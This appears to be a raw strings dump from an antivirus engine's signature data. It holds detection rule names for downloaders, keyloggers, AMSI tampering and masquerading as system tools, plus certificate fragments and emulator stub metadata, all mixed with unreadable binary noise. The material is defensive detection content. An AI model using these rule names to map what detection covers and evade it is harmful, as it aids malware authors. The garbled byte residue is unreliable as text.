N#LowFi:Win32/Generic!PeAttributesSigattrIdContextualU: :#LowFi:SoftwareBundler:MSIL/Protlerdob!LikeyCleanPUS :#LowFi:SoftwareBundler:MSIL/Protlerdob!LikeyCleanPUSU; :#Lowfi:Lua:WrittenToDownloadFolder1SubByWindowsBinary AD:#Lowfi:Lua:WrittenToDownloadFolder1SubByWindowsBinaryU; :#Lowfi:SCPT:Exploit:HTML/Flash_Long_Ascii_One_Pixel.2 :#Lowfi:SCPT:Exploit:HTML/Flash_Long_Ascii_One_Pixel.2U; :#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilWebShell.A :#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilWebShell.AU; 2-8_#Lowfi:CONTEXT:SoftwareBundler:Win32/InstallMonster.A 2-8_#Lowfi:CONTEXT:SoftwareBundler:Win32/InstallMonster.AU; %bY#PERSIST:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.B %bY#PERSIST:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.BU;s cY#PERSIST:HSTR:VirTool:Win32/SuspiciousDllExportName.A cY#PERSIST:HSTR:VirTool:Win32/SuspiciousDllExportName.AU; y:#Lowfi:SIGATTR:TrojanDownloader:Win32/Maldldr.gen!A.1 y:#Lowfi:SIGATTR:TrojanDownloader:Win32/Maldldr.gen!A.1U;\\ :#Lowfi:Lua:WrittenToDesktopFolderByOtherParentProcess :#Lowfi:Lua:WrittenToDesktopFolderByOtherParentProcessU; Y#PERSIST:SIGATTR:Trojan:Win32/CrossRiderCinemaxYou.A1 Y#PERSIST:SIGATTR:Trojan:Win32/CrossRiderCinemaxYou.A1U;l Y#PERSIST:SIGATTR:Program:Win32/CrossRiderRandomExt.A1 Y#PERSIST:SIGATTR:Program:Win32/CrossRiderRandomExt.A1U;c ]#LowFi:BMLua:AccessibilityEscalation.AA!displayswitch ]#LowFi:BMLua:AccessibilityEscalation.AA!displayswitchU; Y#Persist:HSTR:TrojanDownloader:MSIL/ChickenKiller.com Y#Persist:HSTR:TrojanDownloader:MSIL/ChickenKiller.comU; :#Lowfi:PEBMPAT:TrojanDownloader:Win32/Upatre!LoD.TMP1 :#Lowfi:PEBMPAT:TrojanDownloader:Win32/Upatre!LoD.TMP1U; :#LowFi:SCPT:Adware:Win32/PennyBeeLinkury.DigitalSig.A :#LowFi:SCPT:Adware:Win32/PennyBeeLinkury.DigitalSig.AU; :#Lowfi:SCPT:TrojanDownloader:PowerShell/Bartallex_gen :#Lowfi:SCPT:TrojanDownloader:PowerShell/Bartallex_genU; :#LOWFI:RPF:ContextualDropFileOutlookArchiveAttachment :#LOWFI:RPF:ContextualDropFileOutlookArchiveAttachmentU; :#LowFi:SoftwareBundler:Win32/Protlerdob!LikeyCleanPUS :#LowFi:SoftwareBundler:Win32/Protlerdob!LikeyCleanPUSU; Y#PERSIST:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.A Y#PERSIST:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.AU< (]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B (]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.BU< N#Lowfi:HSTR:Win32/Obfuscator.Cutwail_Upatre_GameOver_2 N#Lowfi:HSTR:Win32/Obfuscator.Cutwail_Upatre_GameOver_2U<IAR Y#PERSIST:Lowfi:HSTR:VirTool:Win32/CeeInject.gen!KK_enc Y#PERSIST:Lowfi:HSTR:VirTool:Win32/CeeInject.gen!KK_encU< :#Lowfi:Lua:WrittenToDownloadFolderByOtherParentProcess :#Lowfi:Lua:WrittenToDownloadFolderByOtherParentProcessU<T Y#PERSIST:HSTR:SoftwareBundler:Win32/InstallMonetizer.A Y#PERSIST:HSTR:SoftwareBundler:Win32/InstallMonetizer.AU<Y ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.A ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.AU< :#LowFi:SigAttr:TrojanDownloader:Win32/Banload.BCC_22_6 :#LowFi:SigAttr:TrojanDownloader:Win32/Banload.BCC_22_6U= Y#Persist:HSTR:SoftwareBundler:Win32/Pokavampo!UrlParams Y#Persist:HSTR:SoftwareBundler:Win32/Pokavampo!UrlParamsU= 2-8Y#PERSIST:CONTEXT:SoftwareBundler:Win32/InstallMonster.A 2-8Y#PERSIST:CONTEXT:SoftwareBundler:Win32/InstallMonster.AU=5 b_:#Lowfi:HSTR:VirTool:Win32/Obfuscator.ACV!overlay_unpack b_:#Lowfi:HSTR:VirTool:Win32/Obfuscator.ACV!overlay_unpackU= gN#Lowfi:Lua:SuspiciousExeFileInAppdataMicrosoftWindows.A gN#Lowfi:Lua:SuspiciousExeFileInAppdataMicrosoftWindows.AU= JkY#PERSIST:HSTR:TrojanDownloader:Win32/VitalliaUpd4ter.A1 JkY#PERSIST:HSTR:TrojanDownloader:Win32/VitalliaUpd4ter.A1U= {:#Lowfi:AGG:Win32/Obfuscator.API.NullArgs.COMODO.CA.RU.A {:#Lowfi:AGG:Win32/Obfuscator.API.NullArgs.COMODO.CA.RU.AU= :#Lowfi:Lua:WrittenToDesktopFolderByUnknownParentProcess :#Lowfi:Lua:WrittenToDesktopFolderByUnknownParentProcessU=, :#Lowfi:Lua:VbaProjectWrittenToDownloadFolderNotbyOffice :#Lowfi:Lua:VbaProjectWrittenToDownloadFolderNotbyOfficeU>& ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.3 ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.3U>z Y#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A3 Y#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A3U> =Q&:#Lowfi:SIGATTR:TrojanDownloader:Win32/Upatre!anitemu_LoD =Q&:#Lowfi:SIGATTR:TrojanDownloader:Win32/Upatre!anitemu_LoDU>\"J E:#Lowfi:SCPT:Exploit:HTML/Long_Display_None_Title_Heading 9j?F:#Lowfi:Lua:WrittenToDownloadFolderByUnknownParentProcess E:#Lowfi:SCPT:Exploit:HTML/Long_Display_None_Title_HeadingU>9j?F:#Lowfi:Lua:WrittenToDownloadFolderByUnknownParentProcessU> q}J:#Lowfi:SIGATTR:ZwQuerySystemInformation_PerfInfo_Bailout q}J:#Lowfi:SIGATTR:ZwQuerySystemInformation_PerfInfo_BailoutU> WY#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A2 WY#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A2U> pf:#Lowfi:Lua:WrittenToDesktopSubfolderByOtherParentProcess pf:#Lowfi:Lua:WrittenToDesktopSubfolderByOtherParentProcessU> r]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.2 r]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.2U>\"x :#Lowfi:SCPT:Exploit:HTML/Flash_Min10Levels_Folder_Struct :#Lowfi:SCPT:Exploit:HTML/Flash_Min10Levels_Folder_StructU> ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.4 ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.4U>V Y#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A1 Y#PERSIST:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A1U>!4. :#Lowfi:SoftwareBundler:Win32/OutBrowse!removeclosebutton :#Lowfi:SoftwareBundler:Win32/OutBrowse!removeclosebuttonU> ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.1 ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.1U> ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.5 ]#LowFi:BMLua:Win32/WritesFileAndAddsToASEPWithSusLoc.B.5U? N#Lowfi:SIGATTR:TrojanDownloader:Win32/Upatre!antiemu_qcap N#Lowfi:SIGATTR:TrojanDownloader:Win32/Upatre!antiemu_qcapU? N#LowFi:SIGATTR:TrojanDownloader:Win32/Upatre!antiemu_vdll N#LowFi:SIGATTR:TrojanDownloader:Win32/Upatre!antiemu_vdllU@ {:#Lowfi:Lua:WrittenToDesktopSubfolderByUnknownParentProcess {:#Lowfi:Lua:WrittenToDesktopSubfolderByUnknownParentProcessU@U :#Lowfi:Lua:WrittenToDownloadFolder1SubByOtherParentProcess :#Lowfi:Lua:WrittenToDownloadFolder1SubByOtherParentProcessU@ :#Lowfi:SCPT:Exploit:HTML/Long_Display_None_Title_Heading.2 :#Lowfi:SCPT:Exploit:HTML/Long_Display_None_Title_Heading.2UA :#Lowfi:Lua:VbaProjectWrittenToDownloadFolder1SubNotbyOffice :#Lowfi:Lua:VbaProjectWrittenToDownloadFolder1SubNotbyOfficeUBH @Y#PERSIST:HSTR:Program:Win32/DllSecurityEvader_NotInstallMate @Y#PERSIST:HSTR:Program:Win32/DllSecurityEvader_NotInstallMateUB& `:#Lowfi:SIGATTR:MonitoringTool:Win32/EliteKeyLogger!Installer `:#Lowfi:SIGATTR:MonitoringTool:Win32/EliteKeyLogger!InstallerUB' g:#Lowfi:Lua:WrittenToDownloadFolder1SubByUnknownParentProcess g:#Lowfi:Lua:WrittenToDownloadFolder1SubByUnknownParentProcessUC%~ :#LowFi:Adware:Win32/180SolutionsSearchAssistant!LikeyCleanPUS AceSFXDOS :#LowFi:Adware:Win32/180SolutionsSearchAssistant!LikeyCleanPUSVTAceSFXDOS``^ AceSfx VTAceSfxZ VTAceSfxo VTAceSfxz VTAceSfx ArjSfx VTArjSfxn BascinZip VTBascinZip9\\ CABSfx_GenSfx_0xcf3a4495 VTCABSfx_GenSfx_0xcf3a4495 CABSfx_GenSfx_0xd1745db5 VVVTCABSfx_GenSfx_0xd1745db5 CabSfx_GenSfx_0x1f28ccee RRVTCabSfx_GenSfx_0x1f28ccee CabSfx_GenSfx_0x487d0c0f MSCFVTCabSfx_GenSfx_0x487d0c0f CabSfx_GenSfx_0x6f423861 a8BoD }HMSCFVTCabSfx_GenSfx_0x6f423861a8BoD CabSfx_GenSfx_0x706e0cc3 MSCFVTCabSfx_GenSfx_0x706e0cc3 CabSfx_GenSfx_0x86219d54 MSCFVTCabSfx_GenSfx_0x86219d54T CabSfx_GenSfx_0x9f1b7765 MSCFVTCabSfx_GenSfx_0x9f1b7765ew CabSfx_GenSfx_0xf126adc2 MSCFVTCabSfx_GenSfx_0xf126adc2 ExeDropper MSCFVTExeDropper GLZipSfx ,,VTGLZipSfx@? InfTool VTInfTool InsCons VTInsConsv InstallAnywhere VTInstallAnywhere LHASfx VTLHASfx Lhasfx VTLhasfx[ PaZipSfx -lh5VTPaZipSfx VTPaZipSfx RARsfx VTRARsfxC SelfSWF Rar!VTSelfSWF3 StuffITSfx VTStuffITSfx WinSKR StufVTWinSKR WinZip VTWinZip[r VTWinZip WiseSfx VTWiseSfx MZ00VTWiseSfx ZipSFX 1VTZipSFX ZipSfx VTZipSfx M4Z%) TrustRootStoreMt LKs[y X\tH\"M -YTD% pHellenic Academic and Research Institutions RootCA 2011\\ GR1D0B ;Hellenic Academic and Research Institutions Cert. Authority1@0> 7Hellenic Academic and Research Institutions RootCA 20110 111206134952Z 311201134952Z0 6`K&, .edu0 .org0 +%8Zl \"certSIGN Root CA\t certSIGN1 certSIGN ROOT CA0 060704172004Z 310704172004Z0;1 a@j`WhT 2t<Hn ZNIDTX_B .AffirmTrust CommercialS AffirmTrust Commercial0 100129140606Z 301231140606Z0D1 \"( Iu m~4~ Xgn:P (OX$| \"Amazon Root CA 4\t Amazon1 Amazon Root CA 40 150526000000Z 400526000000Z091 Amazon Root CA 40v0 (N*O5M3Z 8DigiCert Assured ID Root G3\\ www.digicert.com1$0\" DigiCert Assured ID Root G30 380115120000Z0e1 DigiCert Assured ID Root G30v0 VTW Government Root Certification Authority\\ TW100. 'Government Root Certification Authority0 021205132333Z 321205132333Z0?1 8/G?q 0m'KhnK*\\ YPu#is >Actalis Authentication Root CA\\ Milan1#0! Actalis S.p.A./033585209671'0% Actalis Authentication Root CA0 110922112202Z 300922112202Z0k1 zG\"D5 }f _aQ\"U 1EaPN '%7xLQj YTG>4{xmV > t+c 8thawte Primary Root CA - G3\\ /(c) 2008 thawte, Inc. - For authorized use only1$0\" thawte Primary Root CA - G30 080402000000Z 371201235959Z0 h1q83b tqs BY > t+c b46?5 Digidentity BVb Digidentity B.V.1$0\" Digidentity L3 Root CA - G20 110429104419Z 311110104419Z0N1 JE-S8$ Kwudo =0;09 010/ #http://pki.digidentity.eu/validatie0 6E`!C1 Tk~\"W 4c<JUj w[sH2 2GPKI ApplicationCA2 Root\\ 125372828280 Japanese Government1 0 GPKI1 ApplicationCA2 Root0 130312150000Z 330312150000Z0X1 0 CA2 Root0 rt.wW0 y\\i/C Uh[s Ctd~` f&'%0 Uk7/ UkJC UuD;$; UuD;$; UuEk i9Q;p Y/@WP U{\\* M9#e' Kh<,2UnB U|bxh U|bxh U~suQ U~suQ <P 7u:W 3tFD} $cbl' 5s@({ e6!w@E YIpgg m cR HWK3h ~9cv+ \t9H,73 Tqp|! Odmu<b PvXE; !N)Al _H\\1Hg =?Ae4!ng F:$|{ =lv|h' wTH\tUvM #~$6\\ 2Brcx LFB,i 9!R#p;Y yWX $SA5| K8Yil k%rod .3hAW R l]p UmJ6 -x{! CK<Q! 59.& 1 o({Cw (!)7N c[$J\" nrk<n a\t\t!@ Ez$C+# yT!A+ jcmj\" 4/j;j 4(OIW !t)n7q %Prk B V;1N} .!Q6L 40dgi- c0{#5 &/l`b6 =>z%$ []VyU V\ts;N V\ts;N jdU~m Mnh FN +Nk(VF V!Ve V#de V$q=;'~J9\" V$q=;'~J9\" 6i9 } V*F=y V*F=y ' qA, V- R+ F V- R+ F System.Drawing.dll MODULEINFO SystemColors Equals GetHashCode get_IsEmpty get_Width set_Width get_Height set_Height IsEmpty set_X set_Y Subtract get_R System.IO Stream FromStream m_IsFromPEImage m_CrtPixel PixelPayloadLen PixelPayloadB64Len PixelPayloadB64Array GetModuleInformation IsFromPEImage lpBaseOfDll get_Control modinfo IntPtr MpInternal MPInternal <PrivateImplementationDetails>{A89D47BA-5496-45DB-B917-79B293EBE49E} __StaticArrayInitTypeSize=36 $$method0x600002e-1 RuntimeHelpers RuntimeFieldHandle __StaticArrayInitTypeSize=48 $$method0x600002e-2 <Module>System.Drawing.dllSizeSystem.DrawingSizeFPointColorImageBitmapMODULEINFOSystemColorsmscorlibSystemValueTypeObjectheightwidthEmpty.ctorEqualsGetHashCodeop_Equalityop_Inequalityop_Explicitget_IsEmptyget_Widthset_Widthget_Heightset_Height.cctorIsEmptyWidthHeightxyget_Xset_Xget_Yset_YAddSubtractOffsetXYm_valueget_RRSystem.IOStreamFromStreamm_streamm_IsFromPEImagem_CrtPixelPixelPayloadPixelPayloadLenPixelPayloadB64PixelPayloadB64LenPixelPayloadArrayPixelPayloadB64ArrayGetModuleInformationGetModuleHandleIsFromPEImageIsSpecialPayloadGetPixellpBaseOfDllSizeOfImageEntryPointget_ControlControlptobjsz1sz2sizevaluepleftrightszdxdystreamhProcesshModulemodinfocblpModuleNamebufferSystem.Runtime.InteropServicesDllImportAttributepsapi.dllkernel32.dllget_BaseAddressIntPtrMpInternalMPInternalReportEventStringget_LengthByte<PrivateImplementationDetails>{A89D47BA-5496-45DB-B917-79B293EBE49E}__StaticArrayInitTypeSize=36$$method0x600002e-1System.Runtime.CompilerServicesRuntimeHelpersArrayRuntimeFieldHandleInitializeArray__StaticArrayInitTypeSize=48$$method0x600002e-2ZeroIec632fd9-1694-4f4a-9bff-f20600e37981 aZWM2MzJmZDktMTY5NC00ZjRhLTliZmYtZjIwNjAwZTM3OTgx 0@6DS d:\\pavbld\\amcore\\MpEngine\\mavutils\\Source\\sigutils\\vdlls\\Microsoft.NET\\VFramework\\System.Drawing\\System.Drawing.pdb 3_CorDllMainmscoree.dll FileVersion0.0.0.0H InternalNameSystem.Drawing.dll( LegalCopyright P OriginalFilenameSystem.Drawing.dll4 Assembly Version0.0.0.00 $ $PEL ; @ ^ H.text Yo\t * lX #~ Microsoft.VisualBasic.dll Win32Native Microsoft.VisualBasic AppWinStyle CompareMethod Interaction Information Conversion Collection AuthenticationMode ShutdownMode WindowsFormsApplicationBase SpecialDirectoriesProxy Microsoft.VisualBasic.MyServices RegistryProxy Network Microsoft.VisualBasic.Devices Computer Conversions Microsoft.VisualBasic.CompilerServices Operators ProjectData Utils Binary CreateObject Environ LBound UBound get_UseCompatibleTextRendering set_EnableVisualStyles set_SaveMySettingsOnExit set_ShutdownStyle set_IsSingleInstance get_MainForm set_MainForm UseCompatibleTextRendering SaveMySettingsOnExit ShutdownStyle IsSingleInstance MainForm get_ProgramFiles get_Programs get_Temp get_CurrentUserApplicationData CurrentUserApplicationData get_SpecialDirectories SpecialDirectories get_FileSystem get_Network get_Registry FileSystem Registry ChangeType ToInteger ConcatenateObject ClearProjectError EndApp CopyArray PathName Style Timeout ProgId ServerName CharCode Expression Delimiter Limit authenticationMode commandLine destinationFileName directory conversionType Right TextCompare Arguments ArgumentNames TypeArguments CopyBack Environment SpecialFolder Int32 Int64 Buffer <Module>Microsoft.VisualBasic.dllWin32NativeMicrosoft.VisualBasicAppWinStyleCompareMethodInteractionInformationConversionCollectionStringsAuthenticationModeMicrosoft.VisualBasic.ApplicationServicesShutdownModeWindowsFormsApplicationBaseSpecialDirectoriesProxyMicrosoft.VisualBasic.MyServicesFileSystemProxyRegistryProxyNetworkMicrosoft.VisualBasic.DevicesServerComputerComputerConversionsMicrosoft.VisualBasic.CompilerServicesOperatorsNewLateBindingProjectDataUtilsmscorlibSystemObjectEnumMAX_PATHGetCommandLineGetEnvironmentVariablevalue__BinaryTextShellCommandCreateObjectEnviron.ctorArrayLBoundUBoundHexLeftLenMidAscChrSplitget_UseCompatibleTextRenderingset_EnableVisualStylesset_SaveMySettingsOnExitset_ShutdownStyleset_IsSingleInstanceOnCreateMainFormSystem.Windows.FormsFormformget_MainFormset_MainFormRunUseCompatibleTextRenderingEnableVisualStylesSaveMySettingsOnExitShutdownStyleIsSingleInstanceMainFormget_ProgramFilesget_Programsget_Tempget_CurrentUserApplicationDataProgramFilesProgramsTempCurrentUserApplicationDataCreateDirectoryget_SpecialDirectoriesCopyFileDeleteFileSpecialDirectoriesURLDownloadToFileDownloadFileget_FileSystemget_Networkget_RegistryFileSystemRegistryToStringToBooleanToCharTypeChangeTypeToIntegerConcatenateObjectCompareStringLateCallLateGetClearProjectErrorEndAppCopyArraylpSrclpDstnSizePathNameStyleWaitTimeoutProgIdServerNamevariableRankNumberstrLengthStartStringCharCodeExpressionDelimiterLimitCompareauthenticationModevaluecommandLinelpPathNamelpSecurityAttributessourceFileNamedestinationFileNameoverwritedirectoryfilepCallerszURLszFileNamedwReservedlpfnCBaddressValueobjconversionTypeRightTextCompareInstanceMemberNameArgumentsArgumentNamesTypeArgumentsCopyBackIgnoreReturnsrcdestSystem.Runtime.InteropServicesDllImportAttributekernel32.dllMpInternalMPInternalCreateProcessCharEmptySubstringByteDecodeEncodeHashget_LengthExceptionConvertToInt32get_CharsToCharArrayApplicationEnvironmentSpecialFolderGetFolderPathSystem.IOPathGetTempPathFileCopyDeleteurlmon.dllInt32Int64Concatop_EqualityBufferBlockCopy cmd.exeF d:\\MPEngine\\amcore\\MpEngine\\mavutils\\Source\\sigutils\\vdlls\\Microsoft.NET\\VFramework\\Microsoft.VisualBasic\\Microsoft.VisualBasic.pdb ;_CorDllMainmscoree.dll InternalNameMicrosoft.VisualBasic.dll( OriginalFilenameMicrosoft.VisualBasic.dll4 $ $PEL 4@@.reloc (\t t Y|,?# Y|,?#uy 'Bd>& 'Bd>&$6p =&=S\\- >\t@Kk#e? >\"WZh dfC@ ? ? knj ;O3x> - ?!\t ':>## )- => Dk>!01 ]$> \\] e_?F> G?#no ,;O3x>$-/ 3e+9> l?S? QUJiU? 6O3x>$ /0;'A? o8&?! o\t?&8W 3^\t?# 3^\t?#^ Q8?%p LRqb = F?!ny m&?$\"E B> #? 1Xu,> k#e? ?\"$)@q > KL5 V[l?S? >\"t{P HD9>& +UHD9>&,P |? Vtw ]_~!> >&hnc > qrGj Q?\"vy & km> |A>\t+2? ~>&34 qb =! :qb =! = =As`<? p9?\"LRh N.`1> F?$qy Zqb = C@ ?\" C@ ?\" ? #=|z ? (,& 9>&KY ]a^,9? Q? pt X?#qr .`1>$ s.`1>$ _g}? $O3x> F12?% =\"<@VX:> FOC@ ? ]h{q> cz??% &Dt=\t u;%(4 @C@ ? 3v5= D3v5= E ?&Nq* ?\"P^h ry.># !_?F> ?DAR? Vsl?S? 3? [] N>!ik/Z lr:(E? km> km> \" |(r>! M|(r>! a<?#de O3x>% 1O3x>% ;*M?# ^`Fx$? h5B?& *r_># *r_># !#SLF:AGGR:Masquerade_as!adrestore.exe &[!#SLF:AGGR:Masquerade_as!adrestore.exe !#SLF:AGGR:Masquerade_as!autorunsc.exe &[!#SLF:AGGR:Masquerade_as!autorunsc.exe !#SLF:AGGR:Masquerade_as!bitsadmin.exe &[!#SLF:AGGR:Masquerade_as!bitsadmin.exe !#SLF:AGGR:Masquerade_as!extexport.exe &[!#SLF:AGGR:Masquerade_as!extexport.exe !#SLF:AGGR:Masquerade_as!mavinject.exe &[!#SLF:AGGR:Masquerade_as!mavinject.exe !#SLF:AGGR:Masquerade_as!sqldumper.exe &[!#SLF:AGGR:Masquerade_as!sqldumper.exe !#SLF:AGGR:Masquerade_as!taskhostw.exe &[!#SLF:AGGR:Masquerade_as!taskhostw.exe !#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.A 4M!#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.A !#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.D 4M!#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.D !#SLF:AGGR:PeDroppedByOffice f!#SLF:AGGR:PeDroppedByOffice !#SLF:AGGR:LnkDroppedByStub!rundll \"`!#SLF:AGGR:LnkDroppedByStub!rundll !#SLF:AGGR:LnkDroppedByStub!cscript #_!#SLF:AGGR:LnkDroppedByStub!cscript !#SLF:AGGR:LnkDroppedByStub!wscript #_!#SLF:AGGR:LnkDroppedByStub!wscript !#SLF:AGGR:PeDroppedByStub!rundll32 #_!#SLF:AGGR:PeDroppedByStub!rundll32 !#SLF:AGGR:Masquerade_as!accessenum.exe '\\!#SLF:AGGR:Masquerade_as!accessenum.exe !#SLF:AGGR:Masquerade_as!adexplorer.exe '\\!#SLF:AGGR:Masquerade_as!adexplorer.exe !#SLF:AGGR:Masquerade_as!autoruns64.exe '\\!#SLF:AGGR:Masquerade_as!autoruns64.exe !#SLF:AGGR:Masquerade_as!diskshadow.exe '\\!#SLF:AGGR:Masquerade_as!diskshadow.exe !#SLF:AGGR:Masquerade_as!powershell.exe '\\!#SLF:AGGR:Masquerade_as!powershell.exe !#SLF:AGGR:Masquerade_as!psshutdown.exe '\\!#SLF:AGGR:Masquerade_as!psshutdown.exe !#SLF:AGGR:Masquerade_as!sqltoolsps.exe '\\!#SLF:AGGR:Masquerade_as!sqltoolsps.exe !#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:60 $`!#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:60 !#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:70 $`!#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:70 !#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:80 $`!#ALF:TTCTX:AMSI2:ML:Jamsi:Detect:80 !#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:70 $`!#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:70 !#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:80 $`!#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:80 !#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:90 $`!#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:90 !#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:95 $`!#ALF:TTCTX:AMSI3:ML:Jamsi:Detect:95 !#SLF:AGGR:ScriptDroppedByStub!mshta $`!#SLF:AGGR:ScriptDroppedByStub!mshta !#SLF:AGGR:Masquerade_as!accesschk64.exe (]!#SLF:AGGR:Masquerade_as!accesschk64.exe !#SLF:AGGR:Masquerade_as!autorunsc64.exe (]!#SLF:AGGR:Masquerade_as!autorunsc64.exe !#SLF:AGGR:Masquerade_as!installutil.exe (]!#SLF:AGGR:Masquerade_as!installutil.exe !#SLF:AGGR:Masquerade_as!vboxdrvinst.exe (]!#SLF:AGGR:Masquerade_as!vboxdrvinst.exe !#SLF:AGGR:Masquerade_as!roccat_swarm.exe )^!#SLF:AGGR:Masquerade_as!roccat_swarm.exe !#SLF:AGGR:Masquerade_as!scriptrunner.exe )^!#SLF:AGGR:Masquerade_as!scriptrunner.exe !#SLF:AGGR:ScriptDroppedByStub!cscript &b!#SLF:AGGR:ScriptDroppedByStub!cscript !#SLF:AGGR:ScriptDroppedByStub!dllhost &b!#SLF:AGGR:ScriptDroppedByStub!dllhost !#SLF:AGGR:ScriptDroppedByStub!wscript &b!#SLF:AGGR:ScriptDroppedByStub!wscript !#SLF:AGGR:Masquerade_as!vsjitdebugger.exe *_!#SLF:AGGR:Masquerade_as!vsjitdebugger.exe !#SLF:AGGR:ScriptDroppedByStub!rundll32 'c!#SLF:AGGR:ScriptDroppedByStub!rundll32 !#SLF:AGGR:Masquerade_as!runscripthelper.exe ,a!#SLF:AGGR:Masquerade_as!runscripthelper.exe !#SLF:AGGR:Masquerade_as!presentationhost.exe -b!#SLF:AGGR:Masquerade_as!presentationhost.exe !#SLF:TTCTX:Trojan:PowerShell/AmsiTampering.A -c!#SLF:TTCTX:Trojan:PowerShell/AmsiTampering.A !#SLF:AGGR:Masquerade_as!infdefaultinstall.exe .c!#SLF:AGGR:Masquerade_as!infdefaultinstall.exe !#SLF:Trojan:JS/SuspiciousScriptDrop.B!rundll32 /b!#SLF:Trojan:JS/SuspiciousScriptDrop.B!rundll32 !#SLF:AGGR:Masquerade_as!diskext.exe $o!#SLF:AGGR:Masquerade_as!diskext.exe !#SLF:AGGR:Masquerade_as!handle.exe #q!#SLF:AGGR:Masquerade_as!handle.exe !#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamper.B .f!#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamper.B !#SLF:AGGR:PeDroppedByStub!pwsh v!#SLF:AGGR:PeDroppedByStub!pwsh !#SLF:AGGR:LnkDroppedByStub!pwsh w!#SLF:AGGR:LnkDroppedByStub!pwsh !#SLF:AGGR:Masquerade_as!register-cimprovider.exe 1f!#SLF:AGGR:Masquerade_as!register-cimprovider.exe !#SLF:TTCTX:Trojan:PowerShell/Win32ExecutionApi.B!amsi 6b!#SLF:TTCTX:Trojan:PowerShell/Win32ExecutionApi.B!amsi !#SLF:AGGR:Masquerade_as!procdump.exe %t!#SLF:AGGR:Masquerade_as!procdump.exe !#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.C 4e!#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.C !#SLF:AGGR:Masquerade_as!bginfo.exe #x!#SLF:AGGR:Masquerade_as!bginfo.exe !#SLF:AGGR:Masquerade_as!livekd.exe #x!#SLF:AGGR:Masquerade_as!livekd.exe !#SLF:AGGR:Masquerade_as!psexec.exe #x!#SLF:AGGR:Masquerade_as!psexec.exe !#SLF:AGGR:Masquerade_as!psfile.exe #x!#SLF:AGGR:Masquerade_as!psfile.exe !#SLF:AGGR:Masquerade_as!psinfo.exe #x!#SLF:AGGR:Masquerade_as!psinfo.exe !#SLF:AGGR:Masquerade_as!pskill.exe #x!#SLF:AGGR:Masquerade_as!pskill.exe !#SLF:AGGR:Masquerade_as!pslist.exe #x!#SLF:AGGR:Masquerade_as!pslist.exe !#SLF:AGGR:Masquerade_as!psping.exe #x!#SLF:AGGR:Masquerade_as!psping.exe !#SLF:AGGR:Masquerade_as!sysmon.exe #x!#SLF:AGGR:Masquerade_as!sysmon.exe !#SLF:TTCTX:SchTaskCmd.B!psh !#SLF:AGGR:ScriptDroppedByStub!pwsh #z!#SLF:AGGR:ScriptDroppedByStub!pwsh !#SLF:AGGR:Masquerade_as!hex2dec.exe $y!#SLF:AGGR:Masquerade_as!hex2dec.exe !#SLF:AGGR:Masquerade_as!procexp.exe $z!#SLF:AGGR:Masquerade_as!procexp.exe !#SLF:AGGR:Masquerade_as!sdelete.exe $z!#SLF:AGGR:Masquerade_as!sdelete.exe !#SLF:AGGR:Masquerade_as!streams.exe $z!#SLF:AGGR:Masquerade_as!streams.exe !#SLF:AGGR:ScriptDroppedByOffice!lync %z!#SLF:AGGR:ScriptDroppedByOffice!lync !#SLF:AGGR:Masquerade_as!syncappvpublishingserver.exe 5j!#SLF:AGGR:Masquerade_as!syncappvpublishingserver.exe !#SLF:TTCTX:AMSI2:ML:Ps !#SLF:AGGR:PdfDroppedByOffice!misc !#SLF:AGGR:Masquerade_as!clockres.exe %|!#SLF:AGGR:Masquerade_as!clockres.exe !#SLF:AGGR:Masquerade_as!junction.exe %|!#SLF:AGGR:Masquerade_as!junction.exe !#SLF:AGGR:Masquerade_as!ntfsinfo.exe %|!#SLF:AGGR:Masquerade_as!ntfsinfo.exe !#SLF:AGGR:Masquerade_as!pipelist.exe %|!#SLF:AGGR:Masquerade_as!pipelist.exe !#SLF:AGGR:Masquerade_as!psgetsid.exe %|!#SLF:AGGR:Masquerade_as!psgetsid.exe 